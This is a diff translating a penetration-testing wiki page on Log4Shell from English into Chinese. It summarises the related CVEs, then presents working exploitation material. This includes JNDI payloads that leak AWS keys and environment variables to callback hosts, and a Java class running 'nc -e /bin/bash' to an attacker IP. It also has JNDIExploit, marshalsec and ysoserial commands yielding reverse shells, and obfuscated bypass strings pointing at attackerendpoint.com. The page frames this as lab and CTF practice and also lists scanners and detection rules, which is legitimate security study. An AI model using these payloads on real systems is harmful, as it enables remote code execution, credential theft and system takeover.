-With a **: present** in the key, as in `${jndi:ldap://example.com/a}` there’s **no prefix** and the **LDAP server is queried for the object**. And these Lookups can be used in both the configuration of Log4j as well as when lines are logged.
+在键中存在**:**时，例如`${jndi:ldap://example.com/a}`，将**没有前缀**，并且**LDAP服务器会查询该对象**。这些查找可以在Log4j的配置中使用，也可以在记录的行中使用。
 
-Therefore, the only thing needed to get RCE a **vulnerable version of Log4j processing information controlled by the user**. And because this is a library widely used by Java applications to log information (Internet facing applications included) it was very common to have log4j logging for example HTTP headers received like the User-Agent. However, log4j is **not used to log only HTTP information but any input** and data the developer indicated.
+因此，获取RCE所需的唯一条件是**处理用户控制信息的Log4j脆弱版本**。由于这是一个被Java应用广泛使用的库来记录信息（包括面向互联网的应用），因此通常会有log4j记录例如接收到的HTTP头信息，如User-Agent。然而，log4j**不仅用于记录HTTP信息，还用于记录开发人员指示的任何输入和数据**。
 
-## Overview of Log4Shell-Related CVEs
+## Log4Shell相关CVE概述
 
-### [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) **\[Critical]**
+### [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) **\[严重]**
 
-This vulnerability is a critical **untrusted deserialization flaw** in the `log4j-core` component, affecting versions from 2.0-beta9 to 2.14.1. It allows **remote code execution (RCE)**, enabling attackers to take over systems. The issue was reported by Chen Zhaojun from Alibaba Cloud Security Team and affects various Apache frameworks. The initial fix in version 2.15.0 was incomplete. Sigma rules for defense are available ([Rule 1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml), [Rule 2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j.yml)).
+此漏洞是`log4j-core`组件中的一个关键**不受信任的反序列化缺陷**，影响版本从2.0-beta9到2.14.1。它允许**远程代码执行（RCE）**，使攻击者能够接管系统。该问题由阿里巴巴云安全团队的陈兆军报告，影响多个Apache框架。版本2.15.0中的初始修复不完整。防御的Sigma规则可用（[规则1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml)，[规则2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j.yml)）。
 
-### [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) **\[Critical]**
+### [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) **\[严重]**
 
-Initially rated low but later upgraded to critical, this CVE is a **Denial of Service (DoS)** flaw resulting from an incomplete fix in 2.15.0 for CVE-2021-44228. It affects non-default configurations, allowing attackers to cause DoS attacks through crafted payloads. A [tweet](https://twitter.com/marcioalm/status/1471740771581652995) showcases a bypass method. The issue is resolved in versions 2.16.0 and 2.12.2 by removing message lookup patterns and disabling JNDI by default.
+最初评级为低，但后来升级为严重，此CVE是由于2.15.0对CVE-2021-44228的修复不完整而导致的**拒绝服务（DoS）**缺陷。它影响非默认配置，允许攻击者通过精心制作的有效负载造成DoS攻击。一条[推文](https://twitter.com/marcioalm/status/1471740771581652995)展示了一种绕过方法。该问题在版本2.16.0和2.12.2中通过删除消息查找模式和默认禁用JNDI得到解决。
 
-### [CVE-2021-4104](https://nvd.nist.gov/vuln/detail/CVE-2021-4104) **\[High]**
+### [CVE-2021-4104](https://nvd.nist.gov/vuln/detail/CVE-2021-4104) **\[高]**
 
-Affecting **Log4j 1.x versions** in non-default configurations using `JMSAppender`, this CVE is an untrusted deserialization flaw. No fix is available for the 1.x branch, which is end-of-life, and upgrading to `log4j-core 2.17.0` is recommended.
+影响**Log4j 1.x版本**在使用`JMSAppender`的非默认配置中，此CVE是一个不受信任的反序列化缺陷。1.x分支没有可用的修复，已结束生命周期，建议升级到`log4j-core 2.17.0`。
 
-### [CVE-2021-42550](https://nvd.nist.gov/vuln/detail/CVE-2021-42550) **\[Moderate]**
+### [CVE-2021-42550](https://nvd.nist.gov/vuln/detail/CVE-2021-42550) **\[中等]**
 
-This vulnerability affects the **Logback logging framework**, a successor to Log4j 1.x. Previously thought to be safe, the framework was found vulnerable, and newer versions (1.3.0-alpha11 and 1.2.9) have been released to address the issue.
+此漏洞影响**Logback日志框架**，这是Log4j 1.x的继任者。之前认为是安全的，该框架被发现存在漏洞，已发布新版本（1.3.0-alpha11和1.2.9）以解决该问题。
 
-### **CVE-2021-45105** **\[High]**
+### **CVE-2021-45105** **\[高]**
 
-Log4j 2.16.0 contains a DoS flaw, prompting the release of `log4j 2.17.0` to fix the CVE. Further details are in BleepingComputer's [report](https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/).
+Log4j 2.16.0包含一个DoS缺陷，促使发布`log4j 2.17.0`以修复该CVE。更多详细信息请参见BleepingComputer的[报告](https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/)。
 
 ### [CVE-2021-44832](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/)
 
-Affecting log4j version 2.17, this CVE requires the attacker to control the configuration file of log4j. It involves potential arbitrary code execution via a configured JDBCAppender. More details are available in the [Checkmarx blog post](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/).
+影响log4j版本2.17，此CVE要求攻击者控制log4j的配置文件。它涉及通过配置的JDBCAppender进行潜在的任意代码执行。更多详细信息请参见[Checkmarx博客文章](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/)。
 
-## Log4Shell Exploitation
+## Log4Shell利用
 
-### Discovery
+### 发现
 
-This vulnerability is very easy to discover if unprotected because it will send at least a **DNS request** to the address you indicate in your payload. Therefore, payloads like:
+如果没有保护，此漏洞非常容易发现，因为它将向您在有效负载中指示的地址发送至少一个**DNS请求**。因此，像这样的有效负载：
 
-- `${jndi:ldap://x${hostName}.L4J.lt4aev8pktxcq2qlpdr5qu5ya.canarytokens.com/a}` (using [canarytokens.com](https://canarytokens.org/generate))
-- `${jndi:ldap://c72gqsaum5n94mgp67m0c8no4hoyyyyyn.interact.sh}` (using [interactsh](https://github.com/projectdiscovery/interactsh))
-- `${jndi:ldap://abpb84w6lqp66p0ylo715m5osfy5mu.burpcollaborator.net}` (using Burp Suite)
-- `${jndi:ldap://2j4ayo.dnslog.cn}` (using [dnslog](http://dnslog.cn))
-- `${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/fe47f5ee-efd7-42ee-9897-22d18976c520}` using (using [huntress](https://log4shell.huntress.com))
+- `${jndi:ldap://x${hostName}.L4J.lt4aev8pktxcq2qlpdr5qu5ya.canarytokens.com/a}`（使用[canarytokens.com](https://canarytokens.org/generate)）
+- `${jndi:ldap://c72gqsaum5n94mgp67m0c8no4hoyyyyyn.interact.sh}`（使用[interactsh](https://github.com/projectdiscovery/interactsh)）
+- `${jndi:ldap://abpb84w6lqp66p0ylo715m5osfy5mu.burpcollaborator.net}`（使用Burp Suite）
+- `${jndi:ldap://2j4ayo.dnslog.cn}`（使用[dnslog](http://dnslog.cn)）
+- `${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/fe47f5ee-efd7-42ee-9897-22d18976c520}`（使用[huntress](https://log4shell.huntress.com)）
 
-Note that **even if a DNS request is received that doesn't mean the application is exploitable** (or even vulnerable), you will need to try to exploit it.
+请注意，**即使收到DNS请求，也不意味着应用程序是可利用的**（甚至不脆弱），您需要尝试利用它。
 
 > [!NOTE]
-> Remember that to **exploit version 2.15** you need to add the **localhost check bypass**: ${jndi:ldap://**127.0.0.1#**...}
+> 请记住，要**利用版本2.15**，您需要添加**localhost检查绕过**：${jndi:ldap://**127.0.0.1#**...}
 
-#### **Local Discovery**
-
-Search for **local vulnerable versions** of the library with:
+#### **本地发现**
 
+搜索**本地脆弱版本**的库：
 ```bash
 find / -name "log4j-core*.jar" 2>/dev/null | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])"
 ```
+### **验证**
 
-### **Verification**
+之前列出的一些平台将允许您插入一些在请求时会被记录的变量数据。\
+这对于两件事非常有用：
 
-Some of the platforms listed before will allow you to insert some variable data that will be logged when it’s requested.\
-This can be very useful for 2 things:
+- **验证**漏洞
+- **利用**漏洞进行**信息外泄**
 
-- To **verify** the vulnerability
-- To **exfiltrate information** abusing the vulnerability
-
-For example you could request something like:\
-or like `${`**`jndi:ldap://jv-${sys:java.version}-hn-${hostName}.ei4frk.dnslog.cn/a}`** and if a **DNS request is received with the value of the env variable**, you know the application is vulnerable.
-
-Other information you could try to **leak**:
+例如，您可以请求类似于：\
+或像 `${`**`jndi:ldap://jv-${sys:java.version}-hn-${hostName}.ei4frk.dnslog.cn/a}`**，如果收到的**DNS请求包含环境变量的值**，您就知道该应用程序存在漏洞。
 
+您可以尝试**泄露**的其他信息：
 ```
 ${env:AWS_ACCESS_KEY_ID}
 ${env:AWS_CONFIG_FILE}
@@ -205,81 +202,69 @@ ${sys:user.name}
 
 Any other env variable name that could store sensitive information
 ```
-
-### RCE Information
+### RCE 信息
 
 > [!NOTE]
-> Hosts running on JDK versions above 6u141, 7u131, or 8u121 are safeguarded against the LDAP class loading attack vector. This is due to the default deactivation of `com.sun.jndi.ldap.object.trustURLCodebase`, which prevents JNDI from loading a remote codebase via LDAP. However, it's crucial to note that these versions are **not protected against the deserialization attack vector**.
+> 运行在 JDK 版本高于 6u141、7u131 或 8u121 的主机已针对 LDAP 类加载攻击向量进行了保护。这是由于默认禁用 `com.sun.jndi.ldap.object.trustURLCodebase`，这防止了 JNDI 通过 LDAP 加载远程代码库。然而，重要的是要注意，这些版本**并未保护免受反序列化攻击向量**。
 >
-> For attackers aiming to exploit these higher JDK versions, it's necessary to leverage a **trusted gadget** within the Java application. Tools like ysoserial or JNDIExploit are often used for this purpose. On the contrary, exploiting lower JDK versions is relatively easier as these versions can be manipulated to load and execute arbitrary classes.
+> 对于旨在利用这些较高 JDK 版本的攻击者，必须在 Java 应用程序中利用**受信任的工具**。像 ysoserial 或 JNDIExploit 这样的工具通常用于此目的。相反，利用较低的 JDK 版本相对容易，因为这些版本可以被操纵以加载和执行任意类。
 >
-> For **more information** (_like limitations on RMI and CORBA vectors_) **check the previous JNDI Naming Reference section** or [https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/](https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/)
+> **更多信息**（_如 RMI 和 CORBA 向量的限制_）**请查看之前的 JNDI 命名参考部分**或 [https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/](https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/)
 
-### RCE - Marshalsec with custom payload
+### RCE - Marshalsec 与自定义有效负载
 
-You can test this in the **THM box:** [**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
-
-Use the tool [**marshalsec**](https://github.com/mbechler/marshalsec) (jar version available [**here**](https://github.com/RandomRobbieBF/marshalsec-jar)). This approach establishes a LDAP referral server to redirect connections to a secondary HTTP server where the exploit will be hosted:
+您可以在 **THM box** 中测试此内容： [**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
 
+使用工具 [**marshalsec**](https://github.com/mbechler/marshalsec)（jar 版本可在 [**这里**](https://github.com/RandomRobbieBF/marshalsec-jar) 获取）。此方法建立一个 LDAP 引用服务器，以将连接重定向到一个次级 HTTP 服务器，在该服务器上将托管漏洞利用：
 ```bash
 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your_ip_http_server>:8000/#Exploit"
 ```
-
-To prompt the target to load a reverse shell code, craft a Java file named `Exploit.java` with the content below:
-
+要提示目标加载反向 shell 代码，创建一个名为 `Exploit.java` 的 Java 文件，内容如下：
 ```java
 public class Exploit {
-    static {
-        try {
-            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP.ADDRESS 9999");
-        } catch (Exception e) {
-            e.printStackTrace();
-        }
-    }
+static {
+try {
+java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP.ADDRESS 9999");
+} catch (Exception e) {
+e.printStackTrace();
+}
+}
 }
 ```
+将Java文件编译成类文件，使用：`javac Exploit.java -source 8 -target 8`。接下来，在包含类文件的目录中启动一个**HTTP服务器**，使用：`python3 -m http.server`。确保**marshalsec LDAP服务器**引用此HTTP服务器。
 
-Compile the Java file into a class file using: `javac Exploit.java -source 8 -target 8`. Next, initiate a **HTTP server** in the directory containing the class file with: `python3 -m http.server`. Ensure the **marshalsec LDAP server** references this HTTP server.
-
-Trigger the execution of the exploit class on the susceptible web server by dispatching a payload resembling:
-
+通过发送类似的有效负载来触发易受攻击的Web服务器上利用类的执行：
 ```bash
 ${jndi:ldap://<LDAP_IP>:1389/Exploit}
 ```
-
-**Note:** This exploit hinges on Java's configuration to permit remote codebase loading via LDAP. If this is not permissible, consider exploiting a trusted class for arbitrary code execution.
+**注意：** 此漏洞依赖于Java的配置，以允许通过LDAP加载远程代码库。如果这不可行，请考虑利用受信任的类进行任意代码执行。
 
 ### RCE - **JNDIExploit**
 
 > [!NOTE]
-> Note that for some reason the author removed this project from github after the discovery of log4shell. You can find a cached version in [https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2](https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) but if you want to respect the decision of the author use a different method to exploit this vuln.
+> 请注意，出于某种原因，作者在发现log4shell后将此项目从github中删除。您可以在[https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2](https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2)找到缓存版本，但如果您想尊重作者的决定，请使用其他方法来利用此漏洞。
 >
-> Moreover, you cannot find the source code in wayback machine, so either analyse the source code, or execute the jar knowing that you don't know what you are executing.
+> 此外，您无法在时光机中找到源代码，因此要么分析源代码，要么执行jar文件，知道您不知道自己在执行什么。
 
-For this example you can just run this **vulnerable web server to log4shell** in port 8080: [https://github.com/christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) (_in the README you will find how to run it_). This vulnerable app is logging with a vulnerable version of log4shell the content of the HTTP request header _X-Api-Version_.
-
-Then, you can download the **JNDIExploit** jar file and execute it with:
+在此示例中，您可以在8080端口运行此**易受攻击的web服务器以进行log4shell**：[https://github.com/christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app)（_在README中您将找到如何运行它_）。此易受攻击的应用程序使用易受攻击的log4shell版本记录HTTP请求头_X-Api-Version_的内容。
 
+然后，您可以下载**JNDIExploit** jar文件并使用以下命令执行它：
 ```bash
 wget https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
 unzip JNDIExploit.v1.2.zip
 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.1 -p 8888 # Use your private IP address and a port where the victim will be able to access
 ```
+在 _com.feihong.ldap.LdapServer_ 和 _com.feihong.ldap.HTTPServer_ 中，您可以看到如何 **创建 LDAP 和 HTTP 服务器**。LDAP 服务器将理解需要提供的有效负载，并将受害者重定向到 HTTP 服务器，后者将提供漏洞利用。\
+在 _com.feihong.ldap.gadgets_ 中，您可以找到 **一些特定的工具**，可以用来执行所需的操作（可能执行任意代码）。在 _com.feihong.ldap.template_ 中，您可以看到不同的模板类，这些类将 **生成漏洞利用**。
 
-After reading the code just a couple of minutes, in _com.feihong.ldap.LdapServer_ and _com.feihong.ldap.HTTPServer_ you can see how the **LDAP and HTTP servers are created**. The LDAP server will understand what payload need to be served and will redirect the victim to the HTTP server, which will serve the exploit.\
-In _com.feihong.ldap.gadgets_ you can find **some specific gadgets** that can be used to excute the desired action (potentially execute arbitrary code). And in _com.feihong.ldap.template_ you can see the different template classes that will **generate the exploits**.
-
-You can see all the available exploits with **`java -jar JNDIExploit-1.2-SNAPSHOT.jar -u`**. Some useful ones are:
-
+您可以使用 **`java -jar JNDIExploit-1.2-SNAPSHOT.jar -u`** 查看所有可用的漏洞利用。一些有用的包括：
 ```bash
 ldap://null:1389/Basic/Dnslog/[domain]
 ldap://null:1389/Basic/Command/Base64/[base64_encoded_cmd]
 ldap://null:1389/Basic/ReverseShell/[ip]/[port]
 # But there are a lot more
 ```
-
-So, in our example, we already have that docker vulnerable app running. To attack it:
-
+所以，在我们的例子中，我们已经有那个易受攻击的 Docker 应用程序在运行。要攻击它：
 ```bash
 # Create a file inside of th vulnerable host:
 curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
@@ -288,16 +273,14 @@ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Comma
 curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/ReverseShell/172.17.0.1/4444}'
 curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMSA0NDQ0IC1lIC9iaW4vc2gK}'
 ```
+当发送攻击时，您将在执行 **JNDIExploit-1.2-SNAPSHOT.jar** 的终端中看到一些输出。
 
-When sending the attacks you will see some output in the terminal where you executed **JNDIExploit-1.2-SNAPSHOT.jar**.
-
-**Remember to check `java -jar JNDIExploit-1.2-SNAPSHOT.jar -u` for other exploitation options. Moreover, in case you need it, you can change the port of the LDAP and HTTP servers.**
+**请记得检查 `java -jar JNDIExploit-1.2-SNAPSHOT.jar -u` 以获取其他利用选项。此外，如果需要，您可以更改 LDAP 和 HTTP 服务器的端口。**
 
 ### RCE - JNDI-Exploit-Kit <a href="#rce__jndiexploitkit_33" id="rce__jndiexploitkit_33"></a>
 
-In a similar way to the previous exploit, you can try to use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to exploit this vulnerability.\
-You can generate the URLs to send to the victim running:
-
+与之前的利用方式类似，您可以尝试使用 [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) 来利用此漏洞。\
+您可以通过运行生成要发送给受害者的 URL：
 ```bash
 # Get reverse shell in port 4444 (only unix)
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.17.0.1:8888 -S 172.17.0.1:4444
@@ -305,36 +288,30 @@ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.
 # Execute command
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.17.0.1:8888 -C "touch /tmp/log4shell"
 ```
-
-_This attack using a custom generated java object will work in labs like the **THM solar room**. However, this won’t generally work (as by default Java is not configured to load remote codebase using LDAP) I think because it’s not abusing a trusted class to execute arbitrary code._
+_这个攻击使用自定义生成的java对象将在像**THM solar room**这样的实验室中有效。然而，这通常不会有效（因为默认情况下Java未配置为使用LDAP加载远程代码库），我认为这是因为它没有滥用受信任的类来执行任意代码。_
 
 ### RCE - JNDI-Injection-Exploit-Plus
 
-[https://github.com/cckuailong/JNDI-Injection-Exploit-Plus](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus) is another tool for generating **workable JNDI links** and provide background services by starting RMI server,LDAP server and HTTP server.\
+[https://github.com/cckuailong/JNDI-Injection-Exploit-Plus](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus) 是另一个生成**可用JNDI链接**的工具，并通过启动RMI服务器、LDAP服务器和HTTP服务器提供后台服务。\
 
 ### RCE - ysoserial & JNDI-Exploit-Kit
 
-This option is really useful to attack **Java versions configured to only trust specified classes and not everyone**. Therefore, **ysoserial** will be used to generate **serializations of trusted classes** that can be used as gadgets to **execute arbitrary code** (_the trusted class abused by ysoserial must be used by the victim java program in order for the exploit to work_).
-
-Using **ysoserial** or [**ysoserial-modified**](https://github.com/pimps/ysoserial-modified) you can create the deserialization exploit that will be downloaded by JNDI:
+这个选项对于攻击**仅信任指定类而不是所有类的Java版本**非常有用。因此，**ysoserial**将用于生成**受信任类的序列化**，这些序列化可以作为小工具来**执行任意代码**（_ysoserial滥用的受信任类必须被受害者的java程序使用，以便利用能够生效_）。
 
+使用**ysoserial**或[**ysoserial-modified**](https://github.com/pimps/ysoserial-modified)，您可以创建将被JNDI下载的反序列化利用：
 ```bash
 # Rev shell via CommonsCollections5
 java -jar ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.14.10/7878 0>&1' > /tmp/cc5.ser
 ```
-
-Use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to generate **JNDI links** where the exploit will be waiting for connections from the vulnerable machines. You can server **different exploit that can be automatically generated** by the JNDI-Exploit-Kit or even your **own deserialization payloads** (generated by you or ysoserial).
-
+使用 [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) 生成 **JNDI 链接**，其中漏洞将等待来自易受攻击机器的连接。您可以提供 **不同的利用程序，这些利用程序可以由 JNDI-Exploit-Kit 自动生成**，甚至是您 **自己的反序列化有效负载**（由您或 ysoserial 生成）。
 ```bash
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
 ```
-
 ![](<../../images/image (1118).png>)
 
-Now you can easily use a generated JNDI link to exploit the vulnerability and obtain a **reverse shell** just sending to a vulnerable version of log4j: **`${ldap://10.10.14.10:1389/generated}`**
-
-### Bypasses
+现在您可以轻松使用生成的 JNDI 链接来利用该漏洞并获得 **反向 shell**，只需发送到一个易受攻击的 log4j 版本：**`${ldap://10.10.14.10:1389/generated}`**
 
+### 绕过方法
 ```java
 ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
 ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
@@ -346,8 +323,7 @@ ${${::-j}ndi:rmi://attackerendpoint.com/} //Notice the use of rmi
 ${${::-j}ndi:dns://attackerendpoint.com/} //Notice the use of dns
 ${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"
 ```
-
-### Automatic Scanners
+### 自动扫描器
 
 - [https://github.com/fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan)
 - [https://github.com/adilsoybali/Log4j-RCE-Scanner](https://github.com/adilsoybali/Log4j-RCE-Scanner)
@@ -356,76 +332,72 @@ ${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"
 - [https://github.com/Qualys/log4jscanwin](https://github.com/Qualys/log4jscanwin)
 - [https://github.com/hillu/local-log4j-vuln-scanner](https://github.com/hillu/local-log4j-vuln-scanner)
 - [https://github.com/logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
-- [https://github.com/palantir/log4j-sniffer](https://github.com/palantir/log4j-sniffer) - Find local vulnerable libraries
+- [https://github.com/palantir/log4j-sniffer](https://github.com/palantir/log4j-sniffer) - 查找本地易受攻击的库
 
-### Labs to test
+### 测试实验室
 
-- [**LogForge HTB machine**](https://app.hackthebox.com/tracks/UHC-track)
-- [**Try Hack Me Solar room**](https://tryhackme.com/room/solar)
+- [**LogForge HTB 机器**](https://app.hackthebox.com/tracks/UHC-track)
+- [**Try Hack Me Solar 房间**](https://tryhackme.com/room/solar)
 - [**https://github.com/leonjza/log4jpwn**](https://github.com/leonjza/log4jpwn)
 - [**https://github.com/christophetd/log4shell-vulnerable-app**](https://github.com/christophetd/log4shell-vulnerable-app)
 
-## Post-Log4Shell Exploitation
+## Post-Log4Shell 利用
 
-In this [**CTF writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) is well explained how it's potentially **possible** to **abuse** some features of **Log4J**.
+在这个 [**CTF 写作**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) 中很好地解释了如何 **可能** **滥用** **Log4J** 的某些功能。
 
-The [**security page**](https://logging.apache.org/log4j/2.x/security.html) of Log4j has some interesting sentences:
+Log4j 的 [**安全页面**](https://logging.apache.org/log4j/2.x/security.html) 有一些有趣的句子：
 
-> From version 2.16.0 (for Java 8), the **message lookups feature has been completely removed**. **Lookups in configuration still work**. Furthermore, Log4j now disables access to JNDI by default. JNDI lookups in configuration now need to be enabled explicitly.
+> 从版本 2.16.0（对于 Java 8）开始，**消息查找功能已完全删除**。**配置中的查找仍然有效**。此外，Log4j 现在默认禁用对 JNDI 的访问。配置中的 JNDI 查找现在需要显式启用。
 
-> From version 2.17.0, (and 2.12.3 and 2.3.1 for Java 7 and Java 6), **only lookup strings in configuration are expanded recursively**; in any other usage, only the top-level lookup is resolved, and any nested lookups are not resolved.
+> 从版本 2.17.0（以及 Java 7 和 Java 6 的 2.12.3 和 2.3.1）开始，**仅在配置中的查找字符串被递归扩展**；在任何其他用法中，仅解析顶级查找，任何嵌套查找都不会被解析。
 
-This means that by default you can **forget using any `jndi` exploit**. Moreover, to perform **recursive lookups** you need to have them configure.
-
-For example, in that CTF this was configured in the file log4j2.xml:
+这意味着默认情况下，您可以 **忘记使用任何 `jndi` 漏洞**。此外，要执行 **递归查找**，您需要进行配置。
 
+例如，在该 CTF 中，这在文件 log4j2.xml 中进行了配置：
 ```xml
 <Console name="Console" target="SYSTEM_ERR">
-    <PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n">
-    </PatternLayout>
+<PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n">
+</PatternLayout>
 </Console>
 ```
+### 环境查找
 
-### Env Lookups
+在 [这个 CTF](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/) 中，攻击者控制了 `${sys:cmd}` 的值，并需要从环境变量中提取标志。\
+如在 [**之前的有效载荷**](jndi-java-naming-and-directory-interface-and-log4shell.md#verification) 中所示，有不同的方法可以访问环境变量，例如：**`${env:FLAG}`**。在这个 CTF 中这没有用，但在其他现实场景中可能会有用。
 
-In [this CTF](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/) the attacker controlled the value of `${sys:cmd}` and needed to exfiltrate the flag from an environment variable.\
-As seen in this page in [**previous payloads**](jndi-java-naming-and-directory-interface-and-log4shell.md#verification) there are different some ways to access env variables, such as: **`${env:FLAG}`**. In this CTF this was useless but it might not be in other real life scenarios.
+### 异常中的提取
 
-### Exfiltration in Exceptions
-
-In the CTF, you **couldn't access the stderr** of the java application using log4J, but Log4J **exceptions are sent to stdout**, which was printed in the python app. This meant that triggering an exception we could access the content. An exception to exfiltrate the flag was: **`${java:${env:FLAG}}`.** This works because **`${java:CTF{blahblah}}`** doesn't exist and an exception with the value of the flag will be shown:
+在 CTF 中，你 **无法访问 java 应用程序的 stderr**，但 Log4J **异常会发送到 stdout**，这在 python 应用程序中被打印。这意味着触发异常时我们可以访问内容。提取标志的异常是：**`${java:${env:FLAG}}`**。这有效是因为 **`${java:CTF{blahblah}}`** 不存在，异常将显示标志的值：
 
 ![](<../../images/image (1023).png>)
 
-### Conversion Patterns Exceptions
+### 转换模式异常
 
-Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example:
+仅提及，你还可以注入新的 [**转换模式**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) 并触发将记录到 `stdout` 的异常。例如：
 
 ![](<../../images/image (683).png>)
 
-This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting.
+这在提取错误消息中的数据时并没有被发现有用，因为查找在转换模式之前没有解决，但它可能对其他事情如检测有用。
 
-### Conversion Patterns Regexes
+### 转换模式正则表达式
 
-However, it's possible to use some **conversion patterns that supports regexes** to exfiltrate information from a lookup by using regexes and abusing **binary search** or **time based** behaviours.
+然而，可以使用一些 **支持正则表达式的转换模式** 通过使用正则表达式和滥用 **二分查找** 或 **基于时间** 的行为来提取信息。
 
-- **Binary search via exception messages**
-
-The conversion pattern **`%replace`** can be use to **replace** **content** from a **string** even using **regexes**. It works like this: `replace{pattern}{regex}{substitution}`\
-Abusing this behaviour you could make replace **trigger an exception if the regex matched** anything inside the string (and no exception if it wasn't found) like this:
+- **通过异常消息进行二分查找**
 
+转换模式 **`%replace`** 可以用来 **替换** **字符串** 中的 **内容**，甚至使用 **正则表达式**。它的工作方式是：`replace{pattern}{regex}{substitution}`\
+滥用这种行为，你可以使替换 **在正则表达式匹配** 字符串中的任何内容时触发异常（如果未找到则不触发异常），如下所示：
 ```bash
 %replace{${env:FLAG}}{^CTF.*}{${error}}
 # The string searched is the env FLAG, the regex searched is ^CTF.*
 ## and ONLY if it's found ${error} will be resolved with will trigger an exception
 ```
+- **基于时间的**
 
-- **Time based**
+正如前一节提到的，**`%replace`** 支持 **regexes**。因此，可以使用来自 [**ReDoS 页面**](../regular-expression-denial-of-service-redos.md) 的有效载荷来导致 **超时**，如果找到标志。\
+例如，像 `%replace{${env:FLAG}}{^(?=CTF)((.`_`)`_`)*salt$}{asd}` 的有效载荷将在该 CTF 中触发 **超时**。
 
